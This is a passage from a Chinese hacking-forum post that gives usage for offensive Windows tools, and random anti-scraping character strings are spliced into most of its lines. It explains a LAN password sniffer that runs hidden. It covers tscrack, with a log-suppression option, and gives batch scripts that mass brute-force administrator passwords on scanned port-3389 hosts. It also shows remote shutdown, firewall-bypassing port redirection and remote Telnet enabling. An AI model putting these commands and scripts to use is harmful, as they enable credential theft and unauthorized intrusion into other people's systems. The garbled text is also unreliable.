TA的每日心情 | 开心 2014-7-28 21:47 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
9楼
楼主 |
发表于 2009-5-4 09:38:18
|
只看该作者
九:4 [; ^) h+ [& A# O
3、命令行方式嗅探器: xsniff.exe
E' T m2 T+ x& z可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
6 W4 v" E8 O' ?) W) M2 N参数说明. g j) X/ \0 |: K8 c
-tcp 输出TCP数据报' V. L9 `. L }' ]3 g4 K
-udp 输出UDP数据报$ ~& g* x. _5 k# x6 W4 \, G/ B
-icmp 输出ICMP数据报# k$ d: V3 c4 B- r
-pass 过滤密码信息- Q7 l# O) ~7 @5 J
-hide 后台运行
0 n$ M6 [# B, B/ F/ u-host 解析主机名. n! }) t% J# ?
-addr IP地址 过滤IP地址
# H. | P6 [* ^' \ e9 W; O6 k4 m' G-port 端口 过滤端口- s4 d S j( E1 g5 G! w% h
-log 文件名 将输出保存到文件
) S h: y2 X4 S' G-asc 以ASCII形式输出
* m1 w, \2 d, S2 }, I" f+ ~-hex 以16进制形式输出) h2 R7 w z9 y8 c
用法示例
4 y4 Y& K: O! y0 ]. @9 r5 n! z/ lxsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中
; r! U, L% x$ {) U0 Qxsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出( h+ j; u, e/ p& `- z
4、终端服务密码破解: tscrack.exe
, {" ~: h. B, p' _4 a5 p参数说明
* }3 E2 a, |+ R) s b4 d-h 显示使用帮助
- t) C* t- X- v* b3 q! K$ ^-v 显示版本信息
* z0 V! K6 W* J-s 在屏幕上打出解密能力+ ^$ J' F& [2 y) p- K
-b 密码错误时发出的声音, | v0 J a1 k0 G6 p9 L
-t 同是发出多个连接(多线程)
3 p( f7 B7 u% |: H/ S2 L h: [& |-N Prevent System Log entries on targeted server& P* Q w0 W4 z# {3 v5 P, e- [' M
-U 卸载移除tscrack组件( D0 J( Y$ K- y
-f 使用-f后面的密码
r8 h5 q" g, d2 c' v-F 间隔时间(频率)
. a' W3 [3 k4 E; v! p7 E: V8 ?-l 使用-l后面的用户名
3 \. A; v i1 S3 O-w 使用-w后面的密码字典% B2 z) ]: a1 a) L8 O' ]9 `
-p 使用-p后面的密码
+ q' V0 w0 n7 k7 }-D 登录主页面
# O7 @) V, e* E; R4 {5 {用法示例3 N# v, c! e8 O6 U" V$ t# K5 d' o
tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的admi
% c. Z7 ` f w9 [" }' n4 Wnistrator的登陆密码
1 k2 |9 V0 c/ B* stscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户) o9 L( ^# a+ U' i3 t) B, b' }
@if not exist ipcscan.txt goto noscan/ Q/ b- H0 A+ }+ ~8 n
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
% D- a4 Q5 }# t/ b, c I, gnscan. x2 l0 X6 k/ L; j2 E
@echo 3389.txt no find or scan faild. T- H$ _* N. h( E( b3 w; Y% L
(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)- ]% R' `8 h% D/ ~5 p
3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat
& z/ i$ i; v6 Y@if not exist tscrack.exe goto noscan" d/ ]% K! _$ M# R( M" \
@tscrack %1 -l administrator -w pass.dic >>rouji.txt% q( j" V3 U% ^ S, {- W6 J
:noscan
- \" |- X+ X- n) k$ d@echo tscrack.exe no find or scan faild
5 ^' \& C8 w% _(②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了): X2 B! {6 {; E3 l. B
hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。
7 D b2 n. _- ^0 d5、其它:
) [, Z' ~/ K' O7 Y; B9 Q: Z5 }Shutdown.exe
" W% v/ v- \8 V% M3 j1 RShutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。)* B1 O: I7 F6 b& f
fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙)
: F0 L% ?- N( sfpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全是www.sina.com.cn的主机信息) [4 [- z! c. A" `. K4 x0 t5 f
Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。
9 L7 @: j, P# f* LOpenTelnet.exe (远程开启telnet工具)" ]4 o+ ^" K$ Z' x; R* g
opentelnet.exe IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。- p3 c" l' `# Q# V! w
NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。
0 L2 ?5 u/ f Z4 [+ s, HResumeTelnet.exe (OpenTelnet附带的另一个工具)! H, a2 S0 c8 r8 M) s2 Q4 \
resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。$ z' s4 l/ `* q0 f4 l
|
|